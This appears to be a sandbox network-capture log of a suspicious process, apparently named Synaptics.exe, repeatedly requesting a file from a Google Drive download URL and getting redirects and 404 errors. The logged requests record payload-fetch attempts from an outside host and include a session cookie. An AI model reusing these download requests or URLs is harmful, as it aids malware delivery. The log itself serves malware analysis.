                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:54 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OyV87gz-xl3MUg69EawJEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        45 | 192.168.2.4 | 49872 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:58 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:58 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JnO6tKM6w6S2qNn-JhVUoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        46 | 192.168.2.4 | 49873 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:11:58 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:59 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:58 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PwImKCe-5J7zOwmTHRMlFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        47 | 192.168.2.4 | 49877 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:00 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:01 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4qrH-xw_kKokj_JvYjz4tY4wPvpIDZw-PBp_7e8RFOMgM1Y0A-Ovlong2yKWKWkmxhO30K8Xo
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DNAx6Nbu9OaUo_wjJxelhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:01 UTC | 140 | IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:12:01 UTC | 1390 | IN
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="k8p0gpslK7k-K8qXqL4f7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:12:01 UTC | 122 | IN
                                                                                        Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        48 | 192.168.2.4 | 49876 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:00 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IbFPBn3tCGUwJl-6ADBbTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        49 | 192.168.2.4 | 49879 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:00 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Z1ZFF8b6zAHIonudL-20Vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        50 | 192.168.2.4 | 49878 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:00 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:01 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC6UQSDGhHohRCXytTvF-Mj5uRR5EYLwwxcln5ZdePBCftb7WvbCfNx7Ti_bWAXk2LOk
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cn6I2J5nrc4Qkb5ID8ODUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:01 UTC | 147 | IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:12:01 UTC | 1390 | IN
                                                                                        Data Ascii: t Found)!!1</title><style nonce="36qRU-hWGFqjj6e9bVZiYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:12:01 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        51 | 192.168.2.4 | 49889 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:03 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:04 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:04 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-oBMgxByuLrSdk4AveNugSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        52 | 192.168.2.4 | 49888 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:03 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:04 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:04 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hjWohUsf45nwCZiwkSCw_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        53 | 192.168.2.4 | 49898 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:06 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-B7U9ZwBRqlQAtvg2fFOblQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        54 | 192.168.2.4 | 49900 | 142.250.181.14 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:06 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wtrmlB6PWPrtBucvup-3Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        55 | 192.168.2.4 | 49897 | 142.250.181.1 | 443 | 7644 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-24 21:12:06 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC6_w0ykohPpKsjtoZ56KJDzBPFu0JoPK49HR0KKLo5Yz3FkrtdAv1ueB4zm0bUvLChp
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
